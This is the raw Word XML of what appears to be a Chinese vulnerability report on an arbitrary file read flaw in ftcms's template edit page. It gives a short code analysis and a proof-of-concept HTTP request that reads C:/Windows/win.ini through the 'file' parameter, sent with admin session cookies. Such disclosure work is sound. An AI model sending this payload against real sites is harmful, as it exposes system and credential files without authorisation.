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B01B" w14:textId="760D4D5C" w:rsidR="00D5390D" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00135D72">
        <w:t>ftcms前台任意文件读取漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DBCA0" w14:textId="23BD5D1C" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9AF53" w14:textId="7948775A" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcms</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00135D72">
        <w:t>template</w:t>
      </w:r>
      <w:r>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面存在任意文件读取漏洞，导致攻击者可以通过该漏洞获取任意敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C17B785" w14:textId="02921ADF" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞影响：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1D9476" w14:textId="048C2DDF" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tcms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C87DA3" w14:textId="21EB0E3B" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞代码分析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518D9F69" w14:textId="7F53D3AB" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48CC816E" wp14:editId="10A0AE85">
            <wp:extent cx="5274310" cy="358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3F88" w14:textId="73BC51EE" w:rsidR="00135D72" w:rsidRDefault="00135D72" w:rsidP="00135D72">
      <w:r>
        <w:t>Get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求获取</w:t>
      </w:r>
      <w:r w:rsidRPr="00135D72">
        <w:t>style</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和file两个参数，跟进file参数进入</w:t>
      </w:r>
      <w:r w:rsidR="000002F4" w:rsidRPr="000002F4">
        <w:t>write_file</w:t>
      </w:r>
      <w:r w:rsidR="000002F4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000002F4">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA00A41" w14:textId="08B61D95" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="00135D72"/>
    <w:p w14:paraId="4D9998EC" w14:textId="44C33A1D" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="00135D72">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A2CA120" wp14:editId="7182DF73">
            <wp:extent cx="5274310" cy="2644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458" w14:textId="6079C439" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="00135D72"/>
    <w:p w14:paraId="3A6997A6" w14:textId="194FB880" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="00135D72">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接fopen打开了该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DD61C8" w14:textId="44BCA27E" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2977D" w14:textId="7199A4D3" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4">
      <w:r>
        <w:t>POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E551842" w14:textId="11905B25" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4"/>
    <w:p w14:paraId="6D82CBC8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 /admin/index.php/template/edit/?style=template&amp;file=C:/Windows/win.ini HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD0B815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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B32E45B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Accept-Encoding: gzip, deflate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6F5205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Accept-Language: zh-CN,zh;q=0.9,en;q=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA774A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Connection: keep-alive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF13D2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Cookie: PHPSESSID=od9da8grnr15rsoe9uofu2b750; username=admin; pwd=admin; ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22f87ffba8552f35b6ae7175a1084bedbc%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A115%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F101.0.4951.54+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1653533628%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22user%22%3Ba%3A11%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22admin%22%3Bs%3A7%3A%22userpwd%22%3Bs%3A32%3A%2221232f297a57a5a743894a0e4a801fc3%22%3Bs%3A5%3A%22email%22%3Bs%3A15%3A%22admin%40localhost%22%3Bs%3A7%3A%22regtime%22%3Bs%3A1%3A%220%22%3Bs%3A5%3A%22regip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A9%3A%22logintime%22%3Bs%3A10%3A%221653531588%22%3Bs%3A7%3A%22</w:t>
      </w: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loginip%22%3Bs%3A9%3A%22127.0.0.1%22%3Bs%3A4%3A%22hits%22%3Bs%3A1%3A%227%22%3Bs%3A9%3A%22listorder%22%3Bs%3A1%3A%220%22%3Bs%3A4%3A%22type%22%3Bs%3A2%3A%2215%22%3B%7D%7D82f37b9f3d78aeb053bc55e8aca89d1744a609a5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68983322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Host: ftcms.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE8302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Referer: </w:t>
      </w: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t>http://ftcms.io/admin/index.php/tp/file_lists/?style=template&amp;tp=default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2624AD88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Upgrade-Insecure-Requests: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68221105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002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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF3EC1E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0552A3" w14:textId="21DA5F0F" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞截图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517D88BB" w14:textId="57F3564F" w:rsidR="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4"/>
    <w:p w14:paraId="2D42EF84" w14:textId="4FE56A66" w:rsidR="000002F4" w:rsidRPr="000002F4" w:rsidRDefault="000002F4" w:rsidP="000002F4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F2FA0B3" wp14:editId="37E329F6">
            <wp:extent cx="5274310" cy="3193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F4" w:rsidRPr="0000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765B" w14:textId="77777777" w:rsidR="00AE12C4" w:rsidRDefault="00AE12C4" w:rsidP="00135D72">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2F63196B" w14:textId="77777777" w:rsidR="00AE12C4" w:rsidRDefault="00AE12C4" w:rsidP="0013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9715" w14:textId="77777777" w:rsidR="00AE12C4" w:rsidRDefault="00AE12C4" w:rsidP="00135D72">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="15972CBC" w14:textId="77777777" w:rsidR="00AE12C4" w:rsidRDefault="00AE12C4" w:rsidP="00135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42"/>
    <w:rsid w:val="000002F4"/>
    <w:rsid w:val="00135D72"/>
    <w:rsid w:val="007F2CF2"/>
    <w:rsid w:val="00AE12C4"/>
    <w:rsid w:val="00B51042"/>
    <w:rsid w:val="00C1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F8850"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3DE93E2F-B27A-43F9-987B-892016EF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D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5D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5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0">
    <w:name w:val="sc0"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00000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0002F4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yulin</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>liu yulin</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-26T03:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-26T03:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>